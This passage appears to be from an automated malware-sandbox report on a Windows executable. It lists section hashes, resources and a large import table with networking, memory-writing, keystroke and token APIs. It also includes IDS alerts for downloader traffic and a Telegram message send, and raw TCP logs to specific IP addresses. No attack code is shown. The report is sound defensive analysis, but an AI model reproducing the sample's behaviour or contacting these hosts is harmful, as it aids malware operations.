                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                  Sections

                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                  .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .rsrc0xd40000xaca280xacc00e36154ed43ec940a9de96b4fd86bd35fFalse0.9617628437047757data7.960649892633962IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .reloc0x1810000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                  Resources

                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                  RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                  RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                  RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                  RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                                                  RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                                                  RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                                                  RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                                                  RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                                                  RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                                                  RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                                                  RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                                                  RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                                                                                                                  RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                                                  RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                                                                                                                  RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                  RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                  RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                  RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                  RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                  RT_RCDATA0xdc7b80xa3cf0data1.0003144747824013
                                                                                                                  RT_GROUP_ICON0x1804a80x76dataEnglishGreat Britain0.6610169491525424
                                                                                                                  RT_GROUP_ICON0x1805200x14dataEnglishGreat Britain1.25
                                                                                                                  RT_GROUP_ICON0x1805340x14dataEnglishGreat Britain1.15
                                                                                                                  RT_GROUP_ICON0x1805480x14dataEnglishGreat Britain1.25
                                                                                                                  RT_VERSION0x18055c0xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                  RT_MANIFEST0x1806380x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                                                                  Imports

                                                                                                                  DLLImport
                                                                                                                  WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                                                                  VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                  COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                                  MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                                                                  WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                                                                  PSAPI.DLLGetProcessMemoryInfo
                                                                                                                  IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                                                                  USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                                                                  UxTheme.dllIsThemeActive
                                                                                                                  KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                                                                                  USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                                                                                  GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                                                                  COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                                                                  SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                                                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                                                  OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                                                                                                                  Possible Origin

                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                  EnglishGreat Britain

                                                                                                                  Network Behavior

                                                                                                                  Suricata IDS Alerts

                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                  2025-01-14T16:57:18.409625+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049754132.226.247.7380TCP
                                                                                                                  2025-01-14T16:57:19.378341+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049754132.226.247.7380TCP
                                                                                                                  2025-01-14T16:57:20.013836+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049766104.21.96.1443TCP
                                                                                                                  2025-01-14T16:57:20.753551+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049772132.226.247.7380TCP
                                                                                                                  2025-01-14T16:57:22.657564+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049785104.21.96.1443TCP
                                                                                                                  2025-01-14T16:57:25.601214+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049808104.21.96.1443TCP
                                                                                                                  2025-01-14T16:57:28.336258+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049832104.21.96.1443TCP
                                                                                                                  2025-01-14T16:57:30.631224+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049843104.21.96.1443TCP
                                                                                                                  2025-01-14T16:57:32.292308+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.1049853149.154.167.220443TCP
                                                                                                                  2025-01-14T16:57:35.393995+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049871132.226.247.7380TCP
                                                                                                                  2025-01-14T16:57:36.347161+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049871132.226.247.7380TCP
                                                                                                                  2025-01-14T16:57:36.898671+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049886104.21.96.1443TCP
                                                                                                                  2025-01-14T16:57:37.659625+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049889132.226.247.7380TCP
                                                                                                                  2025-01-14T16:57:39.013805+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049901132.226.247.7380TCP
                                                                                                                  2025-01-14T16:57:43.615561+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049937104.21.96.1443TCP
                                                                                                                  2025-01-14T16:57:46.229378+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049958104.21.96.1443TCP
                                                                                                                  2025-01-14T16:57:47.106264+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.1049962149.154.167.220443TCP

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Jan 14, 2025 16:57:17.469666004 CET4975480192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:17.474483967 CET8049754132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:17.474598885 CET4975480192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:17.481364965 CET4975480192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:17.486174107 CET8049754132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:18.147962093 CET8049754132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:18.155138016 CET4975480192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:18.159976006 CET8049754132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:18.363883018 CET8049754132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:18.409625053 CET4975480192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:18.427747011 CET49760443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:18.427797079 CET44349760104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:18.427850962 CET49760443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:18.437958956 CET49760443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:18.437974930 CET44349760104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:18.923985004 CET44349760104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:18.924072027 CET49760443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:18.930344105 CET49760443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:18.930370092 CET44349760104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:18.930783033 CET44349760104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:18.972081900 CET49760443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:18.984522104 CET49760443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:19.031332016 CET44349760104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:19.107120037 CET44349760104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:19.107198000 CET44349760104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:19.107290983 CET49760443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:19.122729063 CET49760443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:19.126864910 CET4975480192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:19.131618023 CET8049754132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:19.335119963 CET8049754132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:19.340482950 CET49766443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:19.340540886 CET44349766104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:19.340630054 CET49766443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:19.340902090 CET49766443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:19.340914011 CET44349766104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:19.378340960 CET4975480192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:19.854934931 CET44349766104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:19.859020948 CET49766443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:19.859052896 CET44349766104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:20.013617039 CET44349766104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:20.013686895 CET44349766104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:20.013724089 CET49766443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:20.014389038 CET49766443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:20.018075943 CET4975480192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:20.019320011 CET4977280192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:20.022981882 CET8049754132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:20.023202896 CET4975480192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:20.024100065 CET8049772132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:20.024167061 CET4977280192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:20.024249077 CET4977280192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:20.028975010 CET8049772132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:20.701334953 CET8049772132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:20.702739000 CET49778443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:20.702778101 CET44349778104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:20.702861071 CET49778443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:20.703310966 CET49778443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:20.703330040 CET44349778104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:20.753551006 CET4977280192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:21.170145988 CET44349778104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:21.171891928 CET49778443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:21.171921968 CET44349778104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:21.316596031 CET44349778104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:21.316653013 CET44349778104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:21.316699028 CET49778443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:21.317123890 CET49778443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:21.328239918 CET4977980192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:21.333014011 CET8049779132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:21.333112001 CET4977980192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:21.333246946 CET4977980192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:21.337960005 CET8049779132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:22.035029888 CET8049779132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:22.036300898 CET49785443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:22.036343098 CET44349785104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:22.036438942 CET49785443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:22.036652088 CET49785443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:22.036663055 CET44349785104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:22.081523895 CET4977980192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:22.496748924 CET44349785104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:22.498327017 CET49785443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:22.498354912 CET44349785104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:22.657588959 CET44349785104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:22.657663107 CET44349785104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:22.657763958 CET49785443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:22.658236980 CET49785443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:22.662075996 CET4977980192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:22.663104057 CET4979180192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:22.667836905 CET8049779132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:22.667923927 CET4977980192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:22.668400049 CET8049791132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:22.668502092 CET4979180192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:22.668600082 CET4979180192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:22.673674107 CET8049791132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:23.380018950 CET8049791132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:23.381443024 CET49796443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:23.381488085 CET44349796104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:23.381681919 CET49796443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:23.381962061 CET49796443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:23.381970882 CET44349796104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:23.425250053 CET4979180192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:23.857999086 CET44349796104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:23.859997988 CET49796443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:23.860024929 CET44349796104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:24.014342070 CET44349796104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:24.014417887 CET44349796104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:24.014482021 CET49796443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:24.014885902 CET49796443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:24.029808998 CET4979180192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:24.031460047 CET4980080192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:24.265185118 CET8049800132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:24.265197992 CET8049791132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:24.265264034 CET4980080192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:24.265301943 CET4979180192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:24.265418053 CET4980080192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:24.270355940 CET8049800132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:24.957489967 CET8049800132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:24.972534895 CET49808443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:24.972575903 CET44349808104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:24.972676039 CET49808443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:24.976557016 CET49808443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:24.976568937 CET44349808104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:25.006390095 CET4980080192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:25.459691048 CET44349808104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:25.461400986 CET49808443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:25.461420059 CET44349808104.21.96.1192.168.2.10
